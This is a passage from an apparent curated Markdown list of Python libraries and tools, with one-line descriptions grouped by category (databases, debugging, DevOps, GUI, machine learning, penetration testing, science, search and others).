* [pyqtgraph](https://github.com/pyqtgraph/pyqtgraph) - Interactive and realtime 2D/3D/Image plotting and science/engineering widgets. * [seaborn](https://github.com/mwaskom/seaborn) - Statistical data visualization using Matplotlib. * [vispy](https://github.com/vispy/vispy) - High-performance scientific visualization based on OpenGL. ## Database *Databases implemented in Python.* * [pickleDB](https://github.com/patx/pickledb) - A simple and lightweight key-value store for Python. * [tinydb](https://github.com/msiemens/tinydb) - A tiny, document-oriented database. * [zodb](https://github.com/zopefoundation/ZODB) - A native object database for Python. A key-value and object graph database. ## Database Drivers *Libraries for connecting and operating databases.* * MySQL - [awesome-mysql](http://shlomi-noach.github.io/awesome-mysql/) * [mysqlclient](https://github.com/PyMySQL/mysqlclient) - MySQL connector with Python 3 support ([mysql-python](https://sourceforge.net/projects/mysql-python/) fork). * [pymysql](https://github.com/PyMySQL/PyMySQL) - A pure Python MySQL driver compatible to mysql-python. * PostgreSQL - [awesome-postgres](https://github.com/dhamaniasad/awesome-postgres) * [psycopg](https://github.com/psycopg/psycopg) - The most popular PostgreSQL adapter for Python. * SQlite - [awesome-sqlite](https://github.com/planetopendata/awesome-sqlite) * [sqlite3](https://docs.python.org/3/library/sqlite3.html) - (Python standard library) SQlite interface compliant with DB-API 2.0. * [sqlite-utils](https://github.com/simonw/sqlite-utils) - Python CLI utility and library for manipulating SQLite databases. * Other Relational Databases * [pymssql](https://github.com/pymssql/pymssql) - A simple database interface to Microsoft SQL Server. * [clickhouse-driver](https://github.com/mymarilyn/clickhouse-driver) - Python driver with native interface for ClickHouse. * NoSQL Databases * [cassandra-driver](https://github.com/datastax/python-driver) - The Python Driver for Apache Cassandra. * [happybase](https://github.com/python-happybase/happybase) - A developer-friendly library for Apache HBase. * [kafka-python](https://github.com/dpkp/kafka-python) - The Python client for Apache Kafka. * [pymongo](https://github.com/mongodb/mongo-python-driver) - The official Python client for MongoDB. * [motor](https://github.com/mongodb/motor) - The async Python driver for MongoDB. * [redis-py](https://github.com/redis/redis-py) - The Python client for Redis. ## Date and Time *Libraries for working with dates and times.* * [arrow](https://github.com/arrow-py/arrow) - A Python library that offers a sensible and human-friendly approach to creating, manipulating, formatting and converting dates, times and timestamps. * [dateutil](https://github.com/dateutil/dateutil) - Extensions to the standard Python [datetime](https://docs.python.org/3/library/datetime.html) module. * [pendulum](https://github.com/sdispater/pendulum) - Python datetimes made easy. * [pytz](https://pypi.org/project/pytz/) - World timezone definitions, modern and historical. Brings the [tz database](https://en.wikipedia.org/wiki/Tz_database) into Python. ## Debugging Tools *Libraries for debugging code.* * pdb-like Debugger * [ipdb](https://github.com/gotcha/ipdb) - IPython-enabled [pdb](https://docs.python.org/3/library/pdb.html). * [pudb](https://github.com/inducer/pudb) - A full-screen, console-based Python debugger. 
* Tracing * [manhole](https://github.com/ionelmc/python-manhole) - Debugging UNIX socket connections and present the stacktraces for all threads and an interactive prompt. * [python-hunter](https://github.com/ionelmc/python-hunter) - A flexible code tracing toolkit. * Profiler * [py-spy](https://github.com/benfred/py-spy) - A sampling profiler for Python programs. Written in Rust. * [vprof](https://github.com/nvdv/vprof) - Visual Python profiler. * Others * [django-debug-toolbar](https://github.com/jazzband/django-debug-toolbar) - Display various debug information for Django. * [flask-debugtoolbar](https://github.com/pallets-eco/flask-debugtoolbar) - A port of the django-debug-toolbar to flask. * [icecream](https://github.com/gruns/icecream) - Inspect variables, expressions, and program execution with a single, simple function call. * [pyelftools](https://github.com/eliben/pyelftools) - Parsing and analyzing ELF files and DWARF debugging information. ## Deep Learning *Frameworks for Neural Networks and Deep Learning. Also see [awesome-deep-learning](https://github.com/ChristosChristofidis/awesome-deep-learning).* * [keras](https://github.com/keras-team/keras) - A high-level neural networks library and capable of running on top of either TensorFlow or Theano. * [pytorch](https://github.com/pytorch/pytorch) - Tensors and Dynamic neural networks in Python with strong GPU acceleration. * [pytorch-lightning](https://github.com/Lightning-AI/pytorch-lightning) - Deep learning framework to train, deploy, and ship AI products Lightning fast. * [stable-baselines3](https://github.com/DLR-RM/stable-baselines3) - PyTorch implementations of Stable Baselines (deep) reinforcement learning algorithms. * [tensorflow](https://github.com/tensorflow/tensorflow) - The most popular Deep Learning framework created by Google. * [theano](https://github.com/Theano/Theano) - A library for fast numerical computation. ## DevOps Tools *Software and libraries for DevOps.* * Configuration Management * [ansible](https://github.com/ansible/ansible) - A radically simple IT automation platform. * [cloudinit](https://github.com/canonical/cloud-init) - A multi-distribution package that handles early initialization of a cloud instance. * [openstack](https://www.openstack.org/) - Open source software for building private and public clouds. * [pyinfra](https://github.com/pyinfra-dev/pyinfra) - A versatile CLI tools and python libraries to automate infrastructure. * [saltstack](https://github.com/saltstack/salt) - Infrastructure automation and management system. * SSH-style Deployment * [cuisine](https://github.com/sebastien/cuisine) - Chef-like functionality for Fabric. * [fabric](https://github.com/fabric/fabric) - A simple, Pythonic tool for remote execution and deployment. * Process Management * [supervisor](https://github.com/Supervisor/supervisor) - Supervisor process control system for UNIX. * Monitoring * [psutil](https://github.com/giampaolo/psutil) - A cross-platform process and system utilities module. * Backup * [borg](https://github.com/borgbackup/borg) - A deduplicating archiver with compression and encryption. ## Distributed Computing *Frameworks and libraries for Distributed Computing.* * Batch Processing * [dask](https://github.com/dask/dask) - A flexible parallel computing library for analytic computing. * [luigi](https://github.com/spotify/luigi) - A module that helps you build complex pipelines of batch jobs. * [PySpark](https://github.com/apache/spark) - [Apache Spark](https://spark.apache.org/) Python API. 
* [Ray](https://github.com/ray-project/ray/) - A system for parallel and distributed Python that unifies the machine learning ecosystem. * Stream Processing * [faust](https://github.com/robinhood/faust) - A stream processing library, porting the ideas from [Kafka Streams](https://kafka.apache.org/documentation/streams/) to Python. * [streamparse](https://github.com/Parsely/streamparse) - Run Python code against real-time streams of data via [Apache Storm](http://storm.apache.org/). ## Distribution *Libraries to create packaged executables for release distribution.* * [py2app](https://github.com/ronaldoussoren/py2app) - Freezes Python scripts (Mac OS X). * [py2exe](https://github.com/py2exe/py2exe) - Freezes Python scripts (Windows). * [pyarmor](https://github.com/dashingsoft/pyarmor) - A tool used to obfuscate python scripts, bind obfuscated scripts to fixed machine or expire obfuscated scripts. * [pyinstaller](https://github.com/pyinstaller/pyinstaller) - Converts Python programs into stand-alone executables (cross-platform). * [shiv](https://github.com/linkedin/shiv) - A command line utility for building fully self-contained zipapps (PEP 441), but with all their dependencies included. ## Documentation *Libraries for generating project documentation.* * [sphinx](https://github.com/sphinx-doc/sphinx/) - Python Documentation generator. * [awesome-sphinxdoc](https://github.com/yoloseem/awesome-sphinxdoc) * [pdoc](https://github.com/mitmproxy/pdoc) - Epydoc replacement to auto generate API documentation for Python libraries. ## Downloader *Libraries for downloading.* * [akshare](https://github.com/jindaxiang/akshare) - A financial data interface library, built for human beings! * [s3cmd](https://github.com/s3tools/s3cmd) - A command line tool for managing Amazon S3 and CloudFront. * [youtube-dl](https://github.com/ytdl-org/youtube-dl/) - A command-line program to download videos from YouTube and other video sites. ## Editor Plugins and IDEs * Emacs * [elpy](https://github.com/jorgenschaefer/elpy) - Emacs Python Development Environment. * Vim * [jedi-vim](https://github.com/davidhalter/jedi-vim) - Vim bindings for the Jedi auto-completion library for Python. * [python-mode](https://github.com/python-mode/python-mode) - An all in one plugin for turning Vim into a Python IDE. * [YouCompleteMe](https://github.com/Valloric/YouCompleteMe) - Includes [Jedi](https://github.com/davidhalter/jedi)-based completion engine for Python. * Visual Studio * [PTVS](https://github.com/Microsoft/PTVS) - Python Tools for Visual Studio. * Visual Studio Code * [Python](https://marketplace.visualstudio.com/items?itemName=ms-python.python) - The official VSCode extension with rich support for Python. * IDE * [PyCharm](https://www.jetbrains.com/pycharm/) - Commercial Python IDE by JetBrains. Has free community edition available. * [spyder](https://github.com/spyder-ide/spyder) - Open Source Python IDE. ## Email *Libraries for sending and parsing email.* * Mail Servers * [modoboa](https://github.com/modoboa/modoboa) - A mail hosting and management platform including a modern Web UI. * [salmon](https://github.com/moggers87/salmon) - A Python Mail Server. * Clients * [imbox](https://github.com/martinrusev/imbox) - Python IMAP for Humans. * [yagmail](https://github.com/kootenpv/yagmail) - Yet another Gmail/SMTP client. * Others * [flanker](https://github.com/mailgun/flanker) - An email address and Mime parsing library. * [mailer](https://github.com/marrow/mailer) - High-performance extensible mail delivery framework. 
## Environment Management *Libraries for Python version and virtual environment management.* * [pyenv](https://github.com/pyenv/pyenv) - Simple Python version management. * [virtualenv](https://github.com/pypa/virtualenv) - A tool to create isolated Python environments. ## File Manipulation *Libraries for file manipulation.* * [mimetypes](https://docs.python.org/3/library/mimetypes.html) - (Python standard library) Map filenames to MIME types. * [pathlib](https://docs.python.org/3/library/pathlib.html) - (Python standard library) An cross-platform, object-oriented path library. * [path.py](https://github.com/jaraco/path.py) - A module wrapper for [os.path](https://docs.python.org/3/library/os.path.html). * [python-magic](https://github.com/ahupp/python-magic) - A Python interface to the libmagic file type identification library. * [watchdog](https://github.com/gorakhargosh/watchdog) - API and shell utilities to monitor file system events. ## Functional Programming *Functional Programming with Python.* * [coconut](https://github.com/evhub/coconut) - A variant of Python built for simple, elegant, Pythonic functional programming. * [funcy](https://github.com/Suor/funcy) - A fancy and practical functional tools. * [more-itertools](https://github.com/erikrose/more-itertools) - More routines for operating on iterables, beyond `itertools`. * [returns](https://github.com/dry-python/returns) - A set of type-safe monads, transformers, and composition utilities. * [cytoolz](https://github.com/pytoolz/cytoolz/) - Cython implementation of `Toolz`: High performance functional utilities. * [toolz](https://github.com/pytoolz/toolz) - A collection of functional utilities for iterators, functions, and dictionaries. ## GUI Development *Libraries for working with graphical user interface applications.* * [curses](https://docs.python.org/3/library/curses.html) - Built-in wrapper for [ncurses](http://www.gnu.org/software/ncurses/) used to create terminal GUI applications. * [Eel](https://github.com/ChrisKnott/Eel) - A library for making simple Electron-like offline HTML/JS GUI apps. * [enaml](https://github.com/nucleic/enaml) - Creating beautiful user-interfaces with Declarative Syntax like QML. * [Flexx](https://github.com/zoofIO/flexx) - Flexx is a pure Python toolkit for creating GUI's, that uses web technology for its rendering. * [Gooey](https://github.com/chriskiehl/Gooey) - Turn command line programs into a full GUI application with one line. * [kivy](https://kivy.org/) - A library for creating NUI applications, running on Windows, Linux, Mac OS X, Android and iOS. * [pyglet](https://github.com/pyglet/pyglet) - A cross-platform windowing and multimedia library for Python. * [PyGObject](https://pygobject.readthedocs.io/) - Python Bindings for GLib/GObject/GIO/GTK+ (GTK+3). * [PyQt](https://doc.qt.io/qtforpython/) - Python bindings for the [Qt](https://www.qt.io/) cross-platform application and UI framework. * [PySimpleGUI](https://github.com/PySimpleGUI/PySimpleGUI) - Wrapper for tkinter, Qt, WxPython and Remi. * [pywebview](https://github.com/r0x0r/pywebview/) - A lightweight cross-platform native wrapper around a webview component. * [Tkinter](https://wiki.python.org/moin/TkInter) - Tkinter is Python's de-facto standard GUI package. * [Toga](https://github.com/pybee/toga) - A Python native, OS native GUI toolkit. * [urwid](http://urwid.org/) - A library for creating terminal GUI applications with strong support for widgets, events, rich colors, etc. 
* [wxPython](https://wxpython.org/) - A blending of the wxWidgets C++ class library with Python.
* [DearPyGui](https://github.com/RaylockLLC/DearPyGui/) - A simple GPU-accelerated Python GUI framework.

## GraphQL

*Libraries for working with GraphQL.*

* [graphene](https://github.com/graphql-python/graphene/) - GraphQL framework for Python.

## Game Development

*Awesome game development libraries.*

* [Arcade](https://api.arcade.academy/en/latest/) - Arcade is a modern Python framework for crafting games with compelling graphics and sound.
* [Cocos2d](https://www.cocos.com/en/cocos2d-x) - cocos2d is a framework for building 2D games, demos, and other graphical/interactive applications.
* [Harfang3D](http://www.harfang3d.com) - Python framework for 3D, VR and game development.
* [Panda3D](https://www.panda3d.org/) - 3D game engine developed by Disney.
* [Pygame](http://www.pygame.org/news.html) - Pygame is a set of Python modules designed for writing games.
* [PyOgre](http://www.ogre3d.org/tikiwiki/PyOgre) - Python bindings for the Ogre 3D render engine, can be used for games, simulations, anything 3D.
* [PyOpenGL](http://pyopengl.sourceforge.net/) - Python ctypes bindings for OpenGL and its related APIs.
* [PySDL2](https://pysdl2.readthedocs.io) - A ctypes based wrapper for the SDL2 library.
* [RenPy](https://www.renpy.org/) - A Visual Novel engine.

## Geolocation

*Libraries for geocoding addresses and working with latitudes and longitudes.*

* [django-countries](https://github.com/SmileyChris/django-countries) - A Django app that provides a country field for models and forms.
* [geodjango](https://docs.djangoproject.com/en/dev/ref/contrib/gis/) - A world-class geographic web framework.
* [geojson](https://github.com/jazzband/geojson) - Python bindings and utilities for GeoJSON.
* [geopy](https://github.com/geopy/geopy) - Python Geocoding Toolbox.

## HTML Manipulation

*Libraries for working with HTML and XML.*

* [beautifulsoup](https://www.crummy.com/software/BeautifulSoup/bs4/doc/) - Providing Pythonic idioms for iterating, searching, and modifying HTML or XML.
* [bleach](https://github.com/mozilla/bleach) - A whitelist-based HTML sanitization and text linkification library.
* [cssutils](https://pypi.org/project/cssutils/) - A CSS library for Python.
* [html5lib](https://github.com/html5lib/html5lib-python) - A standards-compliant library for parsing and serializing HTML documents and fragments.
* [lxml](http://lxml.de/) - A very fast, easy-to-use and versatile library for handling HTML and XML.
* [markupsafe](https://github.com/pallets/markupsafe) - Implements an XML/HTML/XHTML Markup safe string for Python.
* [pyquery](https://github.com/gawel/pyquery) - A jQuery-like library for parsing HTML.
* [untangle](https://github.com/stchris/untangle) - Converts XML documents to Python objects for easy access.
* [WeasyPrint](http://weasyprint.org) - A visual rendering engine for HTML and CSS that can export to PDF.
* [xmldataset](https://xmldataset.readthedocs.io/en/latest/) - Simple XML Parsing.
* [xmltodict](https://github.com/martinblech/xmltodict) - Makes working with XML feel like you are working with JSON.

## HTTP Clients

*Libraries for working with HTTP.*

* [httpx](https://github.com/encode/httpx) - A next generation HTTP client for Python.
* [requests](https://github.com/psf/requests) - HTTP Requests for Humans.
* [treq](https://github.com/twisted/treq) - Python requests-like API built on top of Twisted's HTTP client.
* [urllib3](https://github.com/urllib3/urllib3) - A HTTP library with thread-safe connection pooling, file post support, sanity friendly. ## Hardware *Libraries for programming with hardware.* * [keyboard](https://github.com/boppreh/keyboard) - Hook and simulate global keyboard events on Windows and Linux. * [mouse](https://github.com/boppreh/mouse) - Hook and simulate global mouse events on Windows and Linux. * [pynput](https://github.com/moses-palmer/pynput) - A library to control and monitor input devices. * [scapy](https://github.com/secdev/scapy) - A brilliant packet manipulation library. ## Image Processing *Libraries for manipulating images.* * [pillow](https://github.com/python-pillow/Pillow) - Pillow is the friendly [PIL](http://www.pythonware.com/products/pil/) fork. * [python-barcode](https://github.com/WhyNotHugo/python-barcode) - Create barcodes in Python with no extra dependencies. * [pymatting](http://github.com/pymatting/pymatting) - A library for alpha matting. * [python-qrcode](https://github.com/lincolnloop/python-qrcode) - A pure Python QR Code generator. * [pywal](https://github.com/dylanaraps/pywal) - A tool that generates color schemes from images. * [pyvips](https://github.com/libvips/pyvips) - A fast image processing library with low memory needs. * [quads](https://github.com/fogleman/Quads) - Computer art based on quadtrees. * [scikit-image](http://scikit-image.org/) - A Python library for (scientific) image processing. * [thumbor](https://github.com/thumbor/thumbor) - A smart imaging service. It enables on-demand crop, re-sizing and flipping of images. * [wand](https://github.com/emcconville/wand) - Python bindings for [MagickWand](http://www.imagemagick.org/script/magick-wand.php), C API for ImageMagick. ## Implementations *Implementations of Python.* * [cpython](https://github.com/python/cpython) - **Default, most widely used implementation of the Python programming language written in C.** * [cython](https://github.com/cython/cython) - Optimizing Static Compiler for Python. * [clpython](https://github.com/metawilm/cl-python) - Implementation of the Python programming language written in Common Lisp. * [ironpython](https://github.com/IronLanguages/ironpython3) - Implementation of the Python programming language written in C#. * [micropython](https://github.com/micropython/micropython) - A lean and efficient Python programming language implementation. * [numba](https://github.com/numba/numba) - Python JIT compiler to LLVM aimed at scientific Python. * [peachpy](https://github.com/Maratyszcza/PeachPy) - x86-64 assembler embedded in Python. * [pypy](https://foss.heptapod.net/pypy/pypy) - A very fast and compliant implementation of the Python language. * [pyston](https://github.com/pyston/pyston/) - A Python implementation using JIT techniques. ## Interactive Interpreter *Interactive Python interpreters (REPL).* * [bpython](https://github.com/bpython/bpython) - A fancy interface to the Python interpreter. * [Jupyter Notebook (IPython)](https://jupyter.org) - A rich toolkit to help you make the most out of using Python interactively. * [awesome-jupyter](https://github.com/markusschanta/awesome-jupyter) * [ptpython](https://github.com/jonathanslenders/ptpython) - Advanced Python REPL built on top of the [python-prompt-toolkit](https://github.com/jonathanslenders/python-prompt-toolkit). ## Internationalization *Libraries for working with i18n.* * [Babel](http://babel.pocoo.org/en/latest/) - An internationalization library for Python. 
* [PyICU](https://github.com/ovalhub/pyicu) - A wrapper of International Components for Unicode C++ library ([ICU](http://site.icu-project.org/)). ## Job Scheduler *Libraries for scheduling jobs.* * [Airflow](https://airflow.apache.org/) - Airflow is a platform to programmatically author, schedule and monitor workflows. * [APScheduler](http://apscheduler.readthedocs.io/en/latest/) - A light but powerful in-process task scheduler that lets you schedule functions. * [django-schedule](https://github.com/thauber/django-schedule) - A calendaring app for Django. * [doit](http://pydoit.org/) - A task runner and build tool. * [gunnery](https://github.com/gunnery/gunnery) - Multipurpose task execution tool for distributed systems with web-based interface. * [Joblib](https://joblib.readthedocs.io/) - A set of tools to provide lightweight pipelining in Python. * [Plan](https://github.com/fengsp/plan) - Writing crontab file in Python like a charm. * [Prefect](https://github.com/PrefectHQ/prefect) - A modern workflow orchestration framework that makes it easy to build, schedule and monitor robust data pipelines. * [schedule](https://github.com/dbader/schedule) - Python job scheduling for humans. * [Spiff](https://github.com/knipknap/SpiffWorkflow) - A powerful workflow engine implemented in pure Python. * [TaskFlow](https://docs.openstack.org/developer/taskflow/) - A Python library that helps to make task execution easy, consistent and reliable. ## Logging *Libraries for generating and working with logs.* * [logbook](http://logbook.readthedocs.io/en/stable/) - Logging replacement for Python. * [logging](https://docs.python.org/3/library/logging.html) - (Python standard library) Logging facility for Python. * [loguru](https://github.com/Delgan/loguru) - Library which aims to bring enjoyable logging in Python. * [sentry-python](https://github.com/getsentry/sentry-python) - Sentry SDK for Python. * [structlog](https://www.structlog.org/en/stable/) - Structured logging made easy. ## Machine Learning *Libraries for Machine Learning. Also see [awesome-machine-learning](https://github.com/josephmisiti/awesome-machine-learning#python).* * [gym](https://github.com/openai/gym) - A toolkit for developing and comparing reinforcement learning algorithms. * [H2O](https://github.com/h2oai/h2o-3) - Open Source Fast Scalable Machine Learning Platform. * [Metrics](https://github.com/benhamner/Metrics) - Machine learning evaluation metrics. * [NuPIC](https://github.com/numenta/nupic) - Numenta Platform for Intelligent Computing. * [scikit-learn](http://scikit-learn.org/) - The most popular Python library for Machine Learning. * [Spark ML](http://spark.apache.org/docs/latest/ml-guide.html) - [Apache Spark](http://spark.apache.org/)'s scalable Machine Learning library. * [vowpal_porpoise](https://github.com/josephreisinger/vowpal_porpoise) - A lightweight Python wrapper for [Vowpal Wabbit](https://github.com/JohnLangford/vowpal_wabbit/). * [xgboost](https://github.com/dmlc/xgboost) - A scalable, portable, and distributed gradient boosting library. * [MindsDB](https://github.com/mindsdb/mindsdb) - MindsDB is an open source AI layer for existing databases that allows you to effortlessly develop, train and deploy state-of-the-art machine learning models using standard queries. ## Microsoft Windows *Python programming on Microsoft Windows.* * [Python(x,y)](http://python-xy.github.io/) - Scientific-applications-oriented Python Distribution based on Qt and Spyder. 
* [pythonlibs](http://www.lfd.uci.edu/~gohlke/pythonlibs/) - Unofficial Windows binaries for Python extension packages.
* [PythonNet](https://github.com/pythonnet/pythonnet) - Python Integration with the .NET Common Language Runtime (CLR).
* [PyWin32](https://github.com/mhammond/pywin32) - Python Extensions for Windows.
* [WinPython](https://winpython.github.io/) - Portable development environment for Windows 7/8.

## Miscellaneous

*Useful libraries or tools that don't fit in the categories above.*

* [blinker](https://github.com/jek/blinker) - A fast Python in-process signal/event dispatching system.
* [boltons](https://github.com/mahmoud/boltons) - A set of pure-Python utilities.
* [itsdangerous](https://github.com/pallets/itsdangerous) - Various helpers to pass trusted data to untrusted environments.
* [magenta](https://github.com/magenta/magenta) - A tool to generate music and art using artificial intelligence.
* [pluginbase](https://github.com/mitsuhiko/pluginbase) - A simple but flexible plugin system for Python.
* [tryton](http://www.tryton.org/) - A general purpose business framework.

## Natural Language Processing

*Libraries for working with human languages.*

- General
    * [gensim](https://github.com/RaRe-Technologies/gensim) - Topic Modeling for Humans.
    * [langid.py](https://github.com/saffsd/langid.py) - Stand-alone language identification system.
    * [nltk](http://www.nltk.org/) - A leading platform for building Python programs to work with human language data.
    * [pattern](https://github.com/clips/pattern) - A web mining module.
    * [polyglot](https://github.com/aboSamoor/polyglot) - Natural language pipeline supporting hundreds of languages.
    * [pytext](https://github.com/facebookresearch/pytext) - A natural language modeling framework based on PyTorch.
    * [PyTorch-NLP](https://github.com/PetrochukM/PyTorch-NLP) - A toolkit enabling rapid deep learning NLP prototyping for research.
    * [spacy](https://spacy.io/) - A library for industrial-strength natural language processing in Python and Cython.
    * [Stanza](https://github.com/stanfordnlp/stanza) - The Stanford NLP Group's official Python library, supporting 60+ languages.
- Chinese
    * [funNLP](https://github.com/fighting41love/funNLP) - A collection of tools and datasets for Chinese NLP.
    * [jieba](https://github.com/fxsjy/jieba) - The most popular Chinese text segmentation library.
    * [pkuseg-python](https://github.com/lancopku/pkuseg-python) - A toolkit for Chinese word segmentation in various domains.
    * [snownlp](https://github.com/isnowfy/snownlp) - A library for processing Chinese text.

## Network Virtualization

*Tools and libraries for Virtual Networking and SDN (Software Defined Networking).*

* [mininet](https://github.com/mininet/mininet) - A popular network emulator and API written in Python.
* [napalm](https://github.com/napalm-automation/napalm) - Cross-vendor API to manipulate network devices.
* [pox](https://github.com/noxrepo/pox) - A Python-based platform for SDN control applications, such as OpenFlow SDN controllers.

## News Feed

*Libraries for building users' activity feeds.*

* [django-activity-stream](https://github.com/justquick/django-activity-stream) - Generating generic activity streams from the actions on your site.
* [Stream Framework](https://github.com/tschellenbach/Stream-Framework) - Building news feed and notification systems using Cassandra and Redis.
## ORM *Libraries that implement Object-Relational Mapping or data mapping techniques.* * Relational Databases * [Django Models](https://docs.djangoproject.com/en/dev/topics/db/models/) - The Django ORM. * [SQLAlchemy](https://www.sqlalchemy.org/) - The Python SQL Toolkit and Object Relational Mapper. * [awesome-sqlalchemy](https://github.com/dahlia/awesome-sqlalchemy) * [dataset](https://github.com/pudo/dataset) - Store Python dicts in a database - works with SQLite, MySQL, and PostgreSQL. * [orator](https://github.com/sdispater/orator) - The Orator ORM provides a simple yet beautiful ActiveRecord implementation. * [orm](https://github.com/encode/orm) - An async ORM. * [peewee](https://github.com/coleifer/peewee) - A small, expressive ORM. * [pony](https://github.com/ponyorm/pony/) - ORM that provides a generator-oriented interface to SQL. * [pydal](https://github.com/web2py/pydal/) - A pure Python Database Abstraction Layer. * NoSQL Databases * [hot-redis](https://github.com/stephenmcd/hot-redis) - Rich Python data types for Redis. * [mongoengine](https://github.com/MongoEngine/mongoengine) - A Python Object-Document-Mapper for working with MongoDB. * [PynamoDB](https://github.com/pynamodb/PynamoDB) - A Pythonic interface for [Amazon DynamoDB](https://aws.amazon.com/dynamodb/). * [redisco](https://github.com/kiddouk/redisco) - A Python Library for Simple Models and Containers Persisted in Redis. ## Package Management *Libraries for package and dependency management.* * [pip](https://pip.pypa.io/en/stable/) - The package installer for Python. * [pip-tools](https://github.com/jazzband/pip-tools) - A set of tools to keep your pinned Python dependencies fresh. * [PyPI](https://pypi.org/) * [conda](https://github.com/conda/conda/) - Cross-platform, Python-agnostic binary package manager. * [poetry](https://github.com/sdispater/poetry) - Python dependency management and packaging made easy. ## Package Repositories *Local PyPI repository server and proxies.* * [bandersnatch](https://github.com/pypa/bandersnatch/) - PyPI mirroring tool provided by Python Packaging Authority (PyPA). * [devpi](https://github.com/devpi/devpi) - PyPI server and packaging/testing/release tool. * [localshop](https://github.com/jazzband/localshop) - Local PyPI server (custom packages and auto-mirroring of pypi). * [warehouse](https://github.com/pypa/warehouse) - Next generation Python Package Repository (PyPI). ## Penetration Testing *Frameworks and tools for penetration testing.* * [fsociety](https://github.com/Manisso/fsociety) - A Penetration testing framework. * [setoolkit](https://github.com/trustedsec/social-engineer-toolkit) - A toolkit for social engineering. * [sqlmap](https://github.com/sqlmapproject/sqlmap) - Automatic SQL injection and database takeover tool. ## Permissions *Libraries that allow or deny users access to data or functionality.* * [django-guardian](https://github.com/django-guardian/django-guardian) - Implementation of per object permissions for Django 1.2+ * [django-rules](https://github.com/dfunckt/django-rules) - A tiny but powerful app providing object-level permissions to Django, without requiring a database. ## Processes *Libraries for starting and communicating with OS processes.* * [delegator.py](https://github.com/amitt001/delegator.py) - [Subprocesses](https://docs.python.org/3/library/subprocess.html) for Humans 2.0. * [sarge](https://sarge.readthedocs.io/en/latest/) - Yet another wrapper for subprocess. 
* [sh](https://github.com/amoffat/sh) - A full-fledged subprocess replacement for Python. ## Recommender Systems *Libraries for building recommender systems.* * [annoy](https://github.com/spotify/annoy) - Approximate Nearest Neighbors in C++/Python optimized for memory usage. * [fastFM](https://github.com/ibayer/fastFM) - A library for Factorization Machines. * [implicit](https://github.com/benfred/implicit) - A fast Python implementation of collaborative filtering for implicit datasets. * [libffm](https://github.com/guestwalk/libffm) - A library for Field-aware Factorization Machine (FFM). * [lightfm](https://github.com/lyst/lightfm) - A Python implementation of a number of popular recommendation algorithms. * [spotlight](https://github.com/maciejkula/spotlight) - Deep recommender models using PyTorch. * [Surprise](https://github.com/NicolasHug/Surprise) - A scikit for building and analyzing recommender systems. * [tensorrec](https://github.com/jfkirk/tensorrec) - A Recommendation Engine Framework in TensorFlow. ## Refactoring *Refactoring tools and libraries for Python* * [Bicycle Repair Man](http://bicyclerepair.sourceforge.net/) - Bicycle Repair Man, a refactoring tool for Python. * [Bowler](https://pybowler.io/) - Safe code refactoring for modern Python. * [Rope](https://github.com/python-rope/rope) - Rope is a python refactoring library. ## RESTful API *Libraries for building RESTful APIs.* * Django * [django-rest-framework](https://github.com/encode/django-rest-framework) - A powerful and flexible toolkit to build web APIs. * [django-tastypie](https://github.com/django-tastypie/django-tastypie) - Creating delicious APIs for Django apps. * Flask * [eve](https://github.com/pyeve/eve) - REST API framework powered by Flask, MongoDB and good intentions. * [flask-api](https://github.com/flask-api/flask-api) - Browsable Web APIs for Flask. * [flask-restful](https://github.com/flask-restful/flask-restful) - Quickly building REST APIs for Flask. * Pyramid * [cornice](https://github.com/Cornices/cornice) - A RESTful framework for Pyramid. * Framework agnostic * [falcon](https://github.com/falconry/falcon) - A high-performance framework for building cloud APIs and web app backends. * [fastapi](https://github.com/tiangolo/fastapi) - A modern, fast, web framework for building APIs with Python 3.6+ based on standard Python type hints. * [hug](https://github.com/hugapi/hug) - A Python 3 framework for cleanly exposing APIs. * [sandman2](https://github.com/jeffknupp/sandman2) - Automated REST APIs for existing database-driven systems. * [sanic](https://github.com/sanic-org/sanic) - A Python 3.6+ web server and web framework that's written to go fast. ## Robotics *Libraries for robotics.* * [PythonRobotics](https://github.com/AtsushiSakai/PythonRobotics) - This is a compilation of various robotics algorithms with visualizations. * [rospy](http://wiki.ros.org/rospy) - This is a library for ROS (Robot Operating System). ## RPC Servers *RPC-compatible servers.* * [RPyC](https://github.com/tomerfiliba/rpyc) (Remote Python Call) - A transparent and symmetric RPC library for Python * [zeroRPC](https://github.com/0rpc/zerorpc-python) - zerorpc is a flexible RPC implementation based on [ZeroMQ](http://zeromq.org/) and [MessagePack](http://msgpack.org/). ## Science *Libraries for scientific computing. Also see [Python-for-Scientists](https://github.com/TomNicholas/Python-for-Scientists).* * [astropy](http://www.astropy.org/) - A community Python library for Astronomy. 
* [bcbio-nextgen](https://github.com/chapmanb/bcbio-nextgen) - Providing best-practice pipelines for fully automated high throughput sequencing analysis. * [bccb](https://github.com/chapmanb/bcbb) - Collection of useful code related to biological analysis. * [Biopython](http://biopython.org/wiki/Main_Page) - Biopython is a set of freely available tools for biological computation. * [cclib](http://cclib.github.io/) - A library for parsing and interpreting the results of computational chemistry packages. * [Colour](http://colour-science.org/) - Implementing a comprehensive number of colour theory transformations and algorithms. * [Karate Club](https://github.com/benedekrozemberczki/karateclub) - Unsupervised machine learning toolbox for graph structured data. * [NetworkX](https://networkx.github.io/) - A high-productivity software for complex networks. * [NIPY](http://nipy.org) - A collection of neuroimaging toolkits. * [NumPy](http://www.numpy.org/) - A fundamental package for scientific computing with Python. * [ObsPy](https://github.com/obspy/obspy/wiki/) - A Python toolbox for seismology. * [Open Babel](https://open-babel.readthedocs.io/) - A chemical toolbox designed to speak the many languages of chemical data. * [PyDy](http://www.pydy.org/) - Short for Python Dynamics, used to assist with workflow in the modeling of dynamic motion. * [PyMC](https://github.com/pymc-devs/pymc3) - Markov Chain Monte Carlo sampling toolkit. * [QuTiP](http://qutip.org/) - Quantum Toolbox in Python. * [RDKit](http://www.rdkit.org/) - Cheminformatics and Machine Learning Software. * [SciPy](https://www.scipy.org/) - A Python-based ecosystem of open-source software for mathematics, science, and engineering. * [SimPy](https://gitlab.com/team-simpy/simpy) - A process-based discrete-event simulation framework. * [statsmodels](https://github.com/statsmodels/statsmodels) - Statistical modeling and econometrics in Python. * [SymPy](https://github.com/sympy/sympy) - A Python library for symbolic mathematics. * [Zipline](https://github.com/quantopian/zipline) - A Pythonic algorithmic trading library. ## Search *Libraries and software for indexing and performing search queries on data.* * [django-haystack](https://github.com/django-haystack/django-haystack) - Modular search for Django. * [elasticsearch-dsl-py](https://github.com/elastic/elasticsearch-dsl-py) - The official high-level Python client for Elasticsearch. * [elasticsearch-py](https://www.elastic.co/guide/en/elasticsearch/client/python-api/current/index.html) - The official low-level Python client for [Elasticsearch](https://www.elastic.co/products/elasticsearch). * 